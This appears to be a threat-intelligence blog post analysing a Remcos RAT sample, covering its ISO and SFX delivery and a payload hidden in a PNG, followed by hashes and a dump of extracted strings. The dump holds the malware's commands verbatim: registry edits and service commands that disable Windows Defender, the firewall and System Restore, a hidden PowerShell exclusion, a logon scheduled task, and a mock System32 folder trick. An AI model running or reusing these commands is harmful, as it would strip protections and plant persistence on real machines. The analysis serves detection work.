Remcos malware is one active RAT malware nowadays, In this blog I will discuss one interesting sample of Remcos where it use different technique to evade detection, sandbox and many more. The execution flow of this sample is shown in figure 1.
 |
| figure 1: remcos execution flow chart |
Extraction Stage:
This Remcos malware use .ISO file as a container of its malware file that commonly send through spam or phishing e-mail. The malware is compile with self-file extraction rar (sfxrar) that consist of
"Hqspsc.lnk",
"Hqspc" folder that contains "
Hqsp" (.png file) and
"Hqspfhf.exe".
The "Hqspsc.lnk" is pointing to the
"Hqspfhf.exe" that will unpack multiple executables and .dll modules in memory upon the execution of it.
 |
| figure 2: sfxrar script command |
Execution Stage - .PNG Steganography Decryption:
In this stage the
"Hqspfhf.exe" will decrypt in memory a .dll module that will locate the encrypted .dll module embedded to the
"Hqspc". The decryptor will locate the marker "
911..;" to the .png file and then compute the size of the encrypted data to decrypt it.
 |
| figure 3: decryptor looking for the marker of the encrypted executable in PNG file. |
The embedded encrypted file in .png is a executable container of the Remcos malware. This file container also has some features to evade Windows Defender Anti-Virus by disabling its services, tweaking some of its configuration in registry and many more.
 |
| figure 4: embedded executable in PNG file "Hqspc" |
 |
| figure 4.1: the PNG file contains encrypted executable |
 |
| figure 5: killing Windows Defender Anti-Virus |
Execution Stage - .Decrypting and Loading Remcos RAT:
As soon as the embedded file is decrypted and executed in memory it will decrypt another executable which is the remcos malware that will be executed also in the infected machine.
 |
| figure 6: Remcos RAT |
Conclusion:
In this Remcos variant we saw how malware author keeps on updating their toolset to evade detection and make their attack a multi-component and embedded multiple executable in a chosen packer container to hide its actual code.
IOC:
sfx file:
sha1:798c17639e6d26a1c343a3ecc956545cf87540e8
md5: ae3063d3ebade140546fd284b2835527
sha256: ba106399e3201a374b6324806ae09f5fa27f86f2c7d85839a4d6146155fc7c73
https://app.any.run/tasks/72547529-e4ec-44d6-9833-081f652dff09
Dll module that contains the encrypted Remcos malware and KILL Windows Defender:
sha1: ea5b33762f86345e7a3659323b439ea562237a70
md5: ff3dc3d04bf3f952d0a47007203216c2
sha256: 45700c3753ee5b185d327dd5c8e2d2a1c0221b0aa86c3ad65a1df151a1dff6d0
https://app.any.run/tasks/13a75725-0420-4252-8ffc-f65e3fe700e8
REMCOS RAT:
sha1: ba9239ee69563d592c30e0e4396f46f705d6e0b4
md5: b9c247a20b84eed9516cef93dfaa3227
sha256: d02d91bf556796803905bf9b4d05d4bdc321c2c3776c8c76c32e879f17b17d9a
https://www.virustotal.com/gui/file-analysis/YjljMjQ3YTIwYjg0ZWVkOTUxNmNlZjkzZGZhYTMyMjc6MTU3OTI1Nzk0NQ==/detection
IOC's Command and String:
92740:DVCLAL
92780:AppData
92796:Local
92812:rwe.exe
92828:oet.vbs
92844:_setko.hta
92864:C:\Users\Public\
92904:path = "
92936:WScript.Sleep
92960:<script>
92980:var shell = new ActiveXObject("Shell.Application");
93040:shell.ShellExecute("
93072:","","","open","0");
93104:window.close();
93128:</script>
93140:C:\Users\Public\Clean.bat
93168:C:\Users\Public\SSPICLI.dll
93196:C:\Users\Public\Runex.bat
93224:C:\Users\Public\perfmon.exe
93260:schtasks /Create /SC ONLOGON /TN
93304: /tr "
93320:" /RL HIGHEST
93344:cmd /c md C:\Windows\
93376:del /q "C:\Windows \System32\*"
93416:rmdir "C:\Windows \System32"
93456:rmdir "C:\Windows \"
93488:powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath
93664:exit
93672:usax
93680:usa
93692:mkdir "\\?\C:\Windows "
93728:mkdir "\\?\C:\Windows \System32"
93772:copy "C:\Users\Public\perfmon.exe" "C:\Windows \System32\"
93840:copy "C:\Users\Public\SSPICLI.dll" "C:\Windows \System32\"
93908:"C:\Windows \System32\perfmon.exe"
93956:C:\Windows\
93976:SOFTWARE\Microsoft\Windows\CurrentVersion\Run
94032:.bat
94040:rasphone.exe
94064:rasphone.exe
94080:runonce.exe
94100:runonce.exe
94112:svchost.exe
94212:TapiUnattend.exe
94308:schtasks.exe
94400:sxstrace.exe
94488:v.exe
94496:Open
96584:l#@
96652:Error
96660:Runtime error at 00000000
96692:0123456789ABCDEF
98844:reg add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t "REG_DWORD" /d "4" /f
98936:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "NoAutoUpdate" /t "REG_DWORD" /d "0" /f
99048:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "AUOptions" /t "REG_DWORD" /d "2" /f
99157:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "ScheduledInstallDay" /t "REG_DWORD" /d "0" /f
99276:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "ScheduledInstallTime" /t "REG_DWORD" /d "3" /f
99396:reg add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t "REG_DWORD" /d "4" /f
99491:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t "REG_DWORD" /d "1" /f
99602:reg add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t "REG_DWORD" /d "4" /f
99698:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t "REG_DWORD" /d "1" /f
99811:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR " /t "REG_DWORD" /d "1" /f
99921:reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableConfig" /t "REG_DWORD" /d "1" /f
100040:reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableSR " /t "REG_DWORD" /d "1" /f
100156:Reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
100264:Reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
100400:Reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
100536:Reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
100674:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "NoAutoUpdate" /t "REG_DWORD" /d "0" /f
100786:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "AUOptions" /t "REG_DWORD" /d "2" /f
100895:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "ScheduledInstallDay" /t "REG_DWORD" /d "0" /f
101014:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "ScheduledInstallTime" /t "REG_DWORD" /d "3" /f
101134:reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t "REG_SZ" /d "Off" /f
101249:reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t "REG_SZ" /d "Off" /f
101363:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t "REG_DWORD" /d "1" /f
101476:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR " /t "REG_DWORD" /d "1" /f
101586:reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableConfig" /t "REG_DWORD" /d "1" /f
101705:reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableSR " /t "REG_DWORD" /d "1" /f
101821:Reg add "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter" /f
102002:Reg add "HKCU\SOFTWARE\Policies\Microsoft\Windows\Explorer" /v "DisableNotificationCenter" /t REG_DWORD /d "1" /f
102117:sc stop windefend
102136:sc delete windefend
102157:netsh firewall set opmode disable
102192:netsh advfirewall set currentprofile state off
102241:net stop wuauserv
102260:REG add "HKLM\SYSTEM\CurrentControlSet\services\MpsSvc" /v Start /t REG_DWORD /d 4 /f
102347:REG add "HKLM\SYSTEM\CurrentControlSet\services\wscsvc" /v Start /t REG_DWORD /d 4 /f
102434:REG add "HKLM\SYSTEM\CurrentControlSet\services\SENS" /v Start /t REG_DWORD /d 4 /f
102519:reg delete hkcu\Environment /v windir /f
